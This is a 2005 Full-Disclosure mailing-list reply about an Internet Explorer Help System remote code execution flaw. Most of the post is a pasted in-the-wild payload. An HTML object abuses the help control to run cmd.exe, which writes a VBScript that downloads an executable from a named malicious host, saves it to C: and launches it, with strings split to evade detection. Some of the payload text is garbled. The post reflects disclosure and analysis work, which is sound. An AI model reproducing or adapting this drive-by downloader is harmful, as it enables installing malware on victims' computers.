[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Internet Explorer Help System RCE

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Internet Explorer Help System RCE
From: Duncan Hill <dhill+fulldisc@xxxxxxxxxxxx>
Date: Fri, 13 May 2005 06:25:54 +0100

On Friday 13 May 2005 06:15, Mike Allen wrote:
> iframedollars.biz/dl/adv622/JQTmudI.jpg

Modded it slightly to do alert instead of document.write and executed on my 
Linux box.

u Q<    WVruCP      A<object id=a 
classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11> 
<param name=command ______alue=shortcut> 
<param name=item1 __alue=',cmd.exe,/c start /min cmd.exe /c "echo on error 
resume next : set o = CreateObject("msxm"+"l2.X"+"MLH"+"TTP") : o.open 
"G"+"ET","http://iframedollars.biz/dl/loadad____622.exe",False : o.send : set 
s = createobject("adod"+"b.str"+"eam") : s.type=1 : s.open : s.write 
o.responseBody : s.sa____etofile "C:"+"\"+"w.e"+"xe",2 > c:\c.___bs&&wscript 
c:\c.______bs&&del c:\c.___bs&&if exist c:\w.exe start c:\w.exe"'> 
</object> 
<script> 

Not sure if the corruption is from editing the script.

Oh, that script at the end is javascript btw, not php.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Internet Explorer Help System RCE
  - From: Mike Allen

Prev by Date: [Full-disclosure] Internet Explorer Help System RCE
Next by Date: [Full-disclosure] [FLSA-2005:154988] Updated openoffice.org packages fix security issues
Previous by thread: [Full-disclosure] Internet Explorer Help System RCE
Next by thread: [Full-disclosure] [FLSA-2005:154988] Updated openoffice.org packages fix security issues
Index(es):
- Date
- Thread